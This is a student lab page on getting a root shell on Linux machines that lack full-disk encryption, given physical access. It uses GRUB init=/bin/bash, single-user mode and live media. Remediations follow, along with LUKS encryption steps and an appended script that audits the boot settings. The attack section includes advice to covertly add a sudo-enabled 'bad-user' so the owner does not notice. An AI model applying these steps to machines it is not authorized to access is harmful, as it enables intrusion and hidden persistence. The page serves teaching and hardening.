====== Breaking into Linux systems ======

===== Objectives =====

  * To explore the various methods of breaking into any Linux system without //FDE// (**Full Disk Encryption**) through physical access.
  * To examine the procedure of setting up FDE and other remediations to prevent this.

===== Prerequisites =====

  * Physical access to the target machine
  * ~60 seconds

===== Procedure =====

==== Method 1: Using /sbin/init to execute a shell ====

[[https://en.wikipedia.org/wiki/Init|Init]] is the first process started during bootup and it initializes the system: it starts, stops and monitors essential service processes during bootup and shutdown. Since the kernel's ''init='' boot parameter can point it at any program, I will use it to execute a root shell in place of the real init when booting the target system.

  - Power on/reboot the target machine.
    - Through a graphical login screen: for a clean reboot just use the shutdown/reboot options in the system menu.
    - Through a Textual User Interface: switch to a text console with --.
    - If all else fails, press the Reset button or power cycle the target machine.
  - Press/hold the key as soon as you see the GRUB splash screen.
  - At the GRUB prompt, press ''e'' to edit the boot entry.
  - While still inside GRUB, add ''init=/bin/bash'' to the end of the ''kernel'' line: ''kernel=/vmlinuz- [...parameters...] init=/bin/bash''
  - Continue booting.

DONE! THAT'S ALL FOLKS!\\
After the target machine finishes booting, the kernel will detect the hardware and immediately drop you into a root shell. Since the system initialization script ''/etc/rc.d/rc.sysinit'' was bypassed and **NOT** executed, you need to remount the root file system to make the system more usable:

  - Mount the /proc file system: ''mount /proc'' (you will see an error message complaining that it was already mounted; ignore it).
  - Remount the root file system in read-write mode: ''mount -o remount,rw /''
  - Depending on how the target's file system is laid out, you may need to mount some other file systems. Let's view the file system table with ''cat /etc/fstab'' and mount any other needed file systems (like ''/home'', ''/usr'', etc.).
  - Do whatever nefarious things you want:
    - **Change the root account password:** ''passwd root''
    - **PROTIP:** I don't recommend doing this. The next time the real user logs into the system they will notice that the root password has been changed and it's **GAME OVER**. We need to be super sneaky, secretive, and surreptitious, so here's something a little less noticeable:
    - Simply add another user without modifying the original root password: ''adduser -D -u 1000 bad-user'' followed by ''passwd bad-user''
    - Now add the newly created user to the sudoers file. This is also not as noticeable as changing the actual root password: open it with ''vi /etc/sudoers'' and add the line ''bad-user ALL=(ALL) ALL''
  - Reboot the target machine to make any changes to the file system persistent:
    - Flush any pending disk I/O to the hardware: ''sync''
    - Unmount any mounted file systems in reverse order: ''umount''
    - Reboot with either or the power switch.

==== Method 2: boot to single-user mode ====

[[https://en.wikipedia.org/wiki/Single_user_mode|Single user mode]] is a start-up mode that boots a multi-user operating system into a single-superuser state. It is often used for diagnosis and triage of a broken or malware-infected system. After booting into single-user mode, a root shell is provided to the user.

  - Power on/reboot the target machine.
    - Through a graphical login screen: for a clean reboot just use the shutdown/reboot options in the system menu.
    - Through a Textual User Interface: switch to a text console with --.
    - If all else fails, press the Reset button or power cycle the target machine.
  - Press/hold the key as soon as you see the GRUB splash screen.
  - At the GRUB prompt, press ''a'' to modify the kernel parameters.
  - Add a space and the letter ''S'' (lower or upper case) to the end of the kernel parameters line: ''kernel=/vmlinuz-version ro root=LABEL=/ [...other-parameters...] S''
  - Sometimes there may still be some mysterious failures in single-user mode because of **Security-Enhanced Linux policy enforcement**.
  - In that case, add another boot parameter before the ''S'': ''enforcing=0''
  - Now press to boot with the newly added parameter.

==== Method 3: Boot a LiveCD/USB Key/initramfs OS ====

=== LiveCD ===

  - Power off the target machine.
    - Through a graphical login screen: for a clean shutdown just use the shutdown options in the system menu.
    - Through a Textual User Interface: switch to a text console with --.
    - If all else fails, press the Reset button or power cycle the target machine.
  - Press/hold the key to enter the BIOS/UEFI setup.
  - Insert any live CD and boot the system.
  - Once it boots, log in to the LiveCD OS and get a terminal. Become root with ''su -'' and mount the file systems as needed.

===== Remediation Methods =====

==== Method 1: BIOS Password ====

  - Reboot the system and go into the BIOS. Disable booting from anything other than the main disk.
  - Set a BIOS password. This prevents unauthorized changes to the BIOS settings without a password.
  - Set a BIOS Power On password. Now the machine will require a password before powering on.

==== Method 2: GRUB Password ====

  - In one terminal, run ''grub-md5-crypt'' as root and follow the directions; it prints an MD5 hash of the password you type.
  - In another terminal, edit the GRUB configuration file inside ''/boot/grub'', named either ''menu.lst'' or ''grub.conf''.
  - Add a new ''password'' line directly below the ''timeout'' line:

<code>
# ... comments above ...
default=0
timeout=5
password --md5 5f3782baec534bae412c27fc0850fc6d
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
......
</code>

  - Now change the file permissions to prevent viewing and recovery of the GRUB password hash.
  - Now if you need to legitimately break into your own machine, you have to press ''p'' while inside GRUB and enter the password before you can edit the boot parameters.

==== Method 3: single-user mode sulogin ====

  - Find where your system has its ''sulogin'' program with this command: ''which sulogin''
  - Requiring ''sulogin'' to be run on entry to single-user mode forces users to enter the root password before they get a shell when booting into single-user mode.
  - To have the system boot up to its default run state (with the login prompt) type
  - How this remedy is configured depends on what is running: traditional init, Upstart or systemd.
  - Look at your file ''/etc/inittab'' and see if it contains a line specifying the ''sysinit'' action.
  - If that file contains a line similar to ''si::sysinit:/etc/rc.d/rc.sysinit'' then you have traditional init. In this case, leave that line alone and add a new line:

<code>
# System initialization
si::sysinit:/etc/rc.d/rc.sysinit
# added line: require sulogin (the root password) in runlevel S
ss:S:respawn:/sbin/sulogin
</code>

  - If that file is mostly comments with just one line specifying ''initdefault'', or is even missing, and you have a directory ''/etc/init'', then you have Upstart for init. In this case:
    - If ''/etc/sysconfig/init'' exists, modify it and change ''SINGLE=/sbin/sushell'' to ''SINGLE=/sbin/sulogin''.
    - If there is no ''/etc/sysconfig/init'', the job file ''/etc/init/rcS.conf'' already prevents booting to an unauthenticated single-user shell, because it execs the recovery menu or ''sulogin'' for runlevel S:

<code>
start on runlevel S
stop on runlevel [!S]

console owner
script
    if [ -x /usr/share/recovery-mode/recovery-menu ]; then
        exec /usr/share/recovery-mode/recovery-menu
    else
        exec /sbin/sulogin
    fi
end script
[...]
</code>

===== Full Disk Encryption =====

==== Loop Device ====

A small file named **//crypt//** will be created and used as an encrypted container to store cryptographic keys needed for booting, hdd encryption, ssh, etc.

<code bash>
# create an empty 256 MiB file 'crypt'
dd if=/dev/zero of=/crypt bs=1M count=256
# attach the file to a loop device node
losetup /dev/loop0 /crypt
# set up the LUKS header (prompts for the passphrase)
cryptsetup -c aes-xts-plain64 --key-size 512 \
    --hash sha512 --iter-time 5000 \
    --use-urandom luksFormat /dev/loop0
# open the container as /dev/mapper/crypt (prompts for the passphrase)
cryptsetup open /dev/loop0 crypt
# create the filesystem on the mapped device
mkfs.ext4 /dev/mapper/crypt
# create the mountpoint
mkdir /mnt/crypt
# mount the container
mount -t ext4 /dev/mapper/crypt /mnt/crypt
...
</code>
<code bash>
# unmount the container
umount /mnt/crypt
# delete the mountpoint
rmdir /mnt/crypt
# close the mapped device
cryptsetup close crypt
# detach the loop device node
losetup -d /dev/loop0
</code>

==== Entire Partition ====

**Note:** ''/dev/sdb1'' will be used as the test partition and ''private'' will be its mapped name. Formatting it destroys whatever is currently on the partition.

<code bash>
# write the LUKS header onto the partition
cryptsetup -c aes-xts-plain64 \
    --key-size 512 --hash sha512 \
    --iter-time 5000 --use-urandom luksFormat /dev/sdb1
# open the volume onto the device mapper as /dev/mapper/private (prompts for the passphrase)
cryptsetup --type luks open /dev/sdb1 private
# create the filesystem on the mapped device, never on /dev/sdb1 itself
mkfs.ext4 /dev/mapper/private
# create the mountpoint and mount the encrypted partition
mkdir /mnt/private
mount -t ext4 /dev/mapper/private /mnt/private
...
# unmount by mountpoint (the mounted device is /dev/mapper/private, not /dev/sdb1)
umount /mnt/private
# close the mapped device
cryptsetup close private
</code>

[[http://lab46.corning-cc.edu/user/nbrimme1/portfolio|Back to my Portfolio]]
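As an added example that is not part of the original page, the following shell script audits the boot-time remediations from Remediation Methods 2 and 3 above (a hashed GRUB legacy menu password, and sulogin for single-user mode in /etc/inittab or Upstart's /etc/sysconfig/init). Every check takes a file path, so it can be pointed at the real files on a host; the sample files it creates here are constructed, and the hash in them is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original page): offline audit of the boot-time
# remediations described above. Each check takes a config file path, so it can
# be run on /boot/grub/menu.lst, /etc/inittab, /etc/sysconfig/init or on copies.

# Prints md5 if a GRUB legacy menu file carries a hashed 'password --md5' entry,
# plaintext if it uses the unhashed 'password <word>' form, none otherwise.
grub_password_mode() {
    if grep -Eq '^[[:space:]]*password[[:space:]]+--md5[[:space:]]+[^[:space:]]+' "$1"; then
        echo md5
    elif grep -Eq '^[[:space:]]*password[[:space:]]+[^-[:space:]]' "$1"; then
        echo plaintext
    else
        echo none
    fi
}

# Succeeds if /etc/inittab has a non-comment entry that respawns sulogin for
# runlevel S, i.e. a line of the form id:S:respawn:/sbin/sulogin.
inittab_requires_sulogin() {
    grep -Eq '^[^#:]+:S:respawn:/sbin/sulogin' "$1"
}

# Succeeds if Upstart's /etc/sysconfig/init names sulogin as the single-user
# shell instead of the default sushell, which gives a root shell with no password.
sysconfig_single_is_sulogin() {
    grep -Eq '^[[:space:]]*SINGLE=/sbin/sulogin[[:space:]]*$' "$1"
}

# Constructed sample files standing in for a hardened host and a weak one.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
printf 'default=0\ntimeout=5\npassword --md5 $1$PLACEHOLDER$notarealhash\nhiddenmenu\n' > "$WORK/menu.lst"
printf 'default=0\ntimeout=5\nhiddenmenu\n' > "$WORK/menu.weak"
printf 'si::sysinit:/etc/rc.d/rc.sysinit\nss:S:respawn:/sbin/sulogin\n' > "$WORK/inittab"
printf '# ss:S:respawn:/sbin/sulogin\n' > "$WORK/inittab.weak"
printf 'SINGLE=/sbin/sulogin\n' > "$WORK/sysconfig.init"
printf 'SINGLE=/sbin/sushell\n' > "$WORK/sysconfig.weak"

# Runs every check against the hardened samples; exit status 0 only if all pass.
audit_samples() {
    status=0
    [ "$(grub_password_mode "$WORK/menu.lst")" = md5 ] || { echo "grub: no hashed password"; status=1; }
    inittab_requires_sulogin "$WORK/inittab" || { echo "inittab: sulogin not required"; status=1; }
    sysconfig_single_is_sulogin "$WORK/sysconfig.init" || { echo "sysconfig: SINGLE is not sulogin"; status=1; }
    [ "$status" -eq 0 ] && echo "all boot-time remediations present"
    return "$status"
}
audit_samples
```

The checks only cover GRUB legacy and init/Upstart files as described on this page; a systemd host needs its own check.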